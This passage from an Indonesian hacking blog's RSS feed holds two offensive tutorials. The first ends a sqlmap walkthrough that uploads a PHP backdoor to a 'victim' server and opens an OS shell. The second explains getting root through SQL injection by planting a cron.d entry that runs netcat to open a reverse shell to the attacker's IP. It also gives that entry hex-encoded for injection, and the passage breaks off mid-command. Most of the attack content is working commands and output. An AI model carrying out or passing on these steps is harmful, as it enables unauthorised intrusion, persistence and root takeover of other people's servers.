/&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Output :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; font-size: medium;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;[14:45:55] [INFO] trying to upload the file stager&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;which web application language does the web server support?&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;[1] ASP&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;[2] ASPX&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;[3] PHP (default)&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;[4] JSP&lt;/code&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Karena kali ini korban saya menggunakan web aplikasi berbahasa PHP, maka saya pilih nomer 3. Tekan enter, kemudian anda diharuskan untuk menentukan, kemana file ini akan diupload?&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Output :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; font-size: medium;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;please provide the web server document root [/var/www/]:&lt;/code&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pada pilihan ini, saya masukan /var/www/. Sedikit catatan untuk pembaca, dalam kenyataannya, anda akan berhadapan dengan web server dengan banyak user, sehingga document root tidak mungkin berada pada folder /var/www/. Beberapa web server, mengatur document root nya pada diretory /home/, atau /var/www/hosts, atau /var/www/vhosts, atau /var/www/[victim]. Setelah menentukan document root, tekan enter. Pada tahap selanjutnya, anda bisa membiarkan value atau jawaban kosong, cukup tekan enter sampai proses upload selesai. Jika berhasil, maka anda akan mendapat output seperti ini:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Output :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-size: medium;"&gt;&lt;b&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;[14:46:08] [INFO] the backdoor has probably been successfully uploaded on '/var/www' - http://10.10.1.128:80/tmpbbxju.php&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;[14:46:08] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;os-shell&amp;gt;&lt;/code&gt;&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;3. Game Over&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Jika berhasil, maka anda hanya perlu memasukan perintah ke dalam os-shell interpreter. Dan menjawab "Y" pada setiap pertanyaan yang muncul.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Output :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-size: medium;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; font-family: monospace; font-weight: bold; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;os-shell&amp;gt; id&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-weight: 800; line-height: 18px;"&gt;do you want to retrieve the command standard output? [Y/n/a] Y&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-weight: 800; line-height: 18px;"&gt;&lt;span style="color: lime;"&gt;command standard output: &amp;nbsp; &amp;nbsp;'&lt;/span&gt;&lt;span style="color: red;"&gt;uid=33(www-data) gid=33(www-data) groups=33(www-data)&lt;/span&gt;&lt;span style="color: lime;"&gt;'&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-v2dcB0pVlIg/T6eI5FoRMbI/AAAAAAAABYo/E7U6DtgOmO0/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="170" src="http://1.bp.blogspot.com/-v2dcB0pVlIg/T6eI5FoRMbI/AAAAAAAABYo/E7U6DtgOmO0/s320/2.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;It is so powerful, isn't it?&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;created by : &lt;span style="color: red;"&gt;red-dragon&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-888065353138485013?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/05/spawn-shell-with-sqlmap.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-cF3tsaGGXaQ/T6eEECwlcZI/AAAAAAAABYc/Sv88WrVBeOg/s72-c/1.png' height='72' width='72'/><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-6638825346867158294</guid><pubDate>Tue, 01 May 2012 05:28:00 +0000</pubDate><atom:updated>2012-05-01T13:26:02.543+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>SQL Injection</category><category domain='http://www.blogger.com/atom/ns#'>burpsuite</category><title>SQL Injection Level 4 [Final]</title><description>Setelah kita menjalani tiga step dari SQL Injection level 4, akhirnya kita sampai di tahap final. Tahap final adalah tahap rooting. Kali ini saya akan menjelaskan cara melakukan rooting hanya dengan menggunakan teknik SQL Injection level 4.&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Masih sama dengan posting tempo lalu, saya masih menggunakan burpsuite untuk membantu saya dalam melakukan decode dan sql injecting.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-ACOVaEmb01A/T59xTd_ZNYI/AAAAAAAABXk/4swtQDE9zpg/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="163" src="http://3.bp.blogspot.com/-ACOVaEmb01A/T59xTd_ZNYI/AAAAAAAABXk/4swtQDE9zpg/s320/1.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Preparation :&lt;/span&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;&lt;span class="fullpost"&gt;Burpsuite &lt;i style="color: lime;"&gt;[dapat ditemukan di backtrack]&lt;/i&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="fullpost"&gt;Netcat&amp;nbsp;&lt;i&gt;&lt;span style="color: lime;"&gt; [dapat ditemukan di backtrack]&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;span class="fullpost"&gt;Briefing :&lt;/span&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;&lt;span class="fullpost"&gt;Ketahuilah apa fungsi dari file yang terdapat di directory /etc/cron.d/&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="fullpost"&gt;Membuat file baru pada directory /etc/cron.d/ dengan perintah back connect root kepada komputer attacker.&amp;nbsp;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="fullpost"&gt;Game Over.&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;span class="fullpost"&gt;Walkthrough&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;span class="fullpost"&gt;&amp;nbsp;1. Apa itu file cron.d?&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Saya akan menjelaskan dengan singkat, apa fungsi dari file /etc/cron.d. File yang terdapat dalam directory ini akan dieksekusi setiap 2 - 5 menit sekali oleh user yang bersangkutan. User yang bersangkutan?&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Contoh sederhana dari file /etc/cron.d/ adalah&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; line-height: 18px; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;* * * * * www-data date&amp;gt;&amp;gt;/tmp/date&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;Kita memiliki contoh file cron.d di sini, sebut saja nama file ini date&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; line-height: 18px; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt; &lt;span style="color: cyan;"&gt;5&lt;/span&gt; &lt;span style="color: red;"&gt;R2&lt;/span&gt; &lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt; &lt;b&gt;ls -l /etc/cron.d/date&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-color: black; display: block; height: auto; max-height: 200px; overflow: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;-rw-r--r-- 1 root root 35 2012-05-01 12:01 /etc/cron.d/date &lt;/b&gt;&lt;br /&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; line-height: 18px; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt; &lt;span style="color: cyan;"&gt;5&lt;/span&gt; &lt;span style="color: red;"&gt;R2&lt;/span&gt; &lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt; &lt;b&gt;cat /etc/cron.d/date&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-color: black; display: block; height: auto; max-height: 200px; overflow: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;* * * * * www-data date&amp;gt;&amp;gt;/tmp/date &lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-color: black; display: block; height: auto; max-height: 200px; overflow: auto;"&gt;&lt;/code&gt;&lt;code style="background-color: black; display: block; height: auto; max-height: 200px; overflow: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-qXk1F794VzI/T59wgOVkDYI/AAAAAAAABXc/-uooruiZLh8/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://4.bp.blogspot.com/-qXk1F794VzI/T59wgOVkDYI/AAAAAAAABXc/-uooruiZLh8/s320/7.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;User www-data akan mengeksekusi perintah&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;code style="background-color: black; display: block; height: auto; max-height: 200px; overflow: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;date&amp;gt;&amp;gt;/tmp/date &lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Dimana output dari perintah date akan disimpan di /tmp/date. Sekarang kita cek isi dari file /tmp/date&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; line-height: 18px; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt; &lt;span style="color: cyan;"&gt;5&lt;/span&gt; &lt;span style="color: red;"&gt;R2&lt;/span&gt; &lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt; &lt;b&gt;cat /tmp/date&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-color: black; display: block; height: auto; max-height: 200px; overflow: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;Tue May&amp;nbsp; 1 11:24:57 WIT 2012&lt;br /&gt;Tue May&amp;nbsp; 1 11:26:01 WIT 2012&lt;br /&gt;  &lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-nxLFDJDcIvQ/T59wX-kDHAI/AAAAAAAABXU/Jj1K8eZaVjQ/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://2.bp.blogspot.com/-nxLFDJDcIvQ/T59wX-kDHAI/AAAAAAAABXU/Jj1K8eZaVjQ/s320/8.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Perhatikan, file /etc/cron.d/date dieksekusi setiap 2 menit. Bagaimana jika user kita ganti dengan root? Tentu saja bisa.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;2. Back connect root&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Kita bisa melakukan back connect root jika netcat dieksekusi oleh root. Sederhananya, kita cukup mengganti user dengan root, kemudian kita tambahkan dengan dengan peritah back connect netcat.&lt;br /&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;* * * * * root /bin/nc.traditional 172.16.243.1 1234 -e /bin/bash&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;Anda bisa mencari tau mengapa saya bisa menemukan netcat pada server target di posting SQL Injection Level 4 [Part 3]. Sementara 172.16.243.1 adalah IP Address saya.&lt;br /&gt;&lt;br /&gt;Kemudian kita decode perintah ini dari ASCII ke HEX dengan bantuan burpsuite. Saya tidak akan menjelaskan lagi cara melakukan decode ASCII ke HEX dengan burpsuite, anda dapat membacanya pada postingan sebelumnya pada SQL Injection Level 4 [Part 3].&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-un1aAPedfg0/T59xtaxmSOI/AAAAAAAABXs/iLB-LKMcr5Q/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="163" src="http://2.bp.blogspot.com/-un1aAPedfg0/T59xtaxmSOI/AAAAAAAABXs/iLB-LKMcr5Q/s320/2.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Ok. Perintah suda di decode menjadi HEX. Sekarang perintah menjadi&lt;br /&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;2a202a202a202a202a20726f6f74202f62696e2f6e632e747261646974696f6e616c203137322e31362e3234332e312031323334202d65202f62696e2f626173680a&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;Catatan Penting:&lt;br /&gt;Ketika melakukan decode dengan burpsuite, pastikan anda menambahkan line baru setelah perintah netcat. Perhatikan gambar di atas.&lt;br /&gt;&lt;br /&gt;Setelah di decode, maka kita masukan perintah SQL seperti ini:&lt;br /&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, 